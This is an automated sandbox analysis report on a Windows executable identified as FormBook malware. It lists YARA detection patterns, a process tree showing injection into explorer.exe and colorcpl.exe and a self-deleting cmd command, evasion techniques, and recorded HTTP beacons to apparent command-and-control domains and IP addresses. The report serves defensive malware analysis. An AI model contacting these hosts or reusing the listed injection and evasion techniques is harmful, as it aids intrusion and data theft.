Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3cGH9Bakuq

Overview

General Information

Sample Name:3cGH9Bakuq (renamed file extension from none to exe)
Analysis ID:491574
MD5:0eca879131a7b104418b085db7f761c3
SHA1:07fa4692aa15a409091bc6190bf33b5942db99e6
SHA256:166559731ad15341f955bf8a16708f93542bef868c33f02f70e9b27f57b991a3
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 3cGH9Bakuq.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\3cGH9Bakuq.exe' MD5: 0ECA879131A7B104418B085DB7F761C3)
    • 3cGH9Bakuq.exe (PID: 6668 cmdline: C:\Users\user\Desktop\3cGH9Bakuq.exe MD5: 0ECA879131A7B104418B085DB7F761C3)
    • 3cGH9Bakuq.exe (PID: 6420 cmdline: C:\Users\user\Desktop\3cGH9Bakuq.exe MD5: 0ECA879131A7B104418B085DB7F761C3)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5908 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • colorcpl.exe (PID: 6676 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 1472 cmdline: /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 25 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x10f4f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x10f882:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x11b595:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11b081:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x11b697:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x11b80f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x11029a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11a2fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x111012:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x120a67:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x121b0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x11d999:$sqlite3step: 68 34 1C 7B E1
          • 0x11daac:$sqlite3step: 68 34 1C 7B E1
          • 0x11d9c8:$sqlite3text: 68 38 2A 90 C5
          • 0x11daed:$sqlite3text: 68 38 2A 90 C5
          • 0x11d9db:$sqlite3blob: 68 53 D8 7F 8C
          • 0x11db03:$sqlite3blob: 68 53 D8 7F 8C
          6.2.3cGH9Bakuq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            6.2.3cGH9Bakuq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 10 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: 3cGH9Bakuq.exeVirustotal: Detection: 26%Perma Link
            Source: 3cGH9Bakuq.exeReversingLabs: Detection: 22%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3cGH9Bakuq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3cGH9Bakuq.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: colorcpl.pdbGCTL source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: colorcpl.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 4x nop then pop ebx6_2_00406ABF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx15_2_00CD6ABF

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.marmorariapiramide.online
            Source: C:\Windows\explorer.exeDomain query: www.emptycc.net
            Source: C:\Windows\explorer.exeDomain query: www.traexcel.com
            Source: C:\Windows\explorer.exeDomain query: www.rangerbuddys.com
            Source: C:\Windows\explorer.exeDomain query: www.omniriot.com
            Source: C:\Windows\explorer.exeNetwork Connect: 104.143.9.211 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.vetpipes.com
            Source: C:\Windows\explorer.exeNetwork Connect: 143.198.15.243 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.208.82.163 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 103.11.189.189 80Jump to behavior
            Source: global trafficHTTP traffic detected: GET /scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1 HTTP/1.1Host: www.vetpipes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F HTTP/1.1Host: www.omniriot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu HTTP/1.1Host: www.rangerbuddys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpString found in binary or memory: http://050005.voodoo.com/js/partner.js
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: 3cGH9Bakuq.exeString found in binary or memory: http://kr.battle.net/heroes/ko/
            Source: 3cGH9Bakuq.exeString found in binary or memory: http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmp, 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: 3cGH9Bakuq.exe, 00000000.00000003.669096429.0000000005685000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667722258.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comh
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: 3cGH9Bakuq.exe, 00000000.00000003.670846550.00000000056BD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: 3cGH9Bakuq.exe, 00000000.00000003.673691153.00000000056BD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comdiafN
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoW
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comt
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnA.
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667177411.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cned
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnenx
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnh-c
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnorm
            Source: 3cGH9Bakuq.exe, 00000000.00000003.676148683.00000000056B7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpString found in binary or memory: http://www.vodien.com/
            Source: colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpString found in binary or memory: http://www.vodien.com/singapore-email-hosting.php
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnA.
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnenx
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnh
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/account/verify_credentials.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/blocks/create.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/blocks/ids.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/direct_messages.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweets
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/create.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/destroy.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/list.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friends/ids.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friends/list.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friendships/no_retweets/ids.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friendships/update.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/destroy/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/mentions_timeline.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/retweet/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/show.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timeli
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_c
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/users/lookup.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/oauth/access_token
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/oauth/authorize?oauth_token=
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/oauth/request_token
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://pbs.twimg.com/media/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://twitter.com/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://twitter.com/Dalsae_info
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://twitter.com/hanalen_
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://upload.twitter.com/1.1/media/upload.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://userstream.twitter.com/1.1/user.json
            Source: unknownDNS traffic detected: queries for: www.emptycc.net
            Source: global trafficHTTP traffic detected: GET /scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1 HTTP/1.1Host: www.vetpipes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F HTTP/1.1Host: www.omniriot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu HTTP/1.1Host: www.rangerbuddys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686274674.000000000098A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
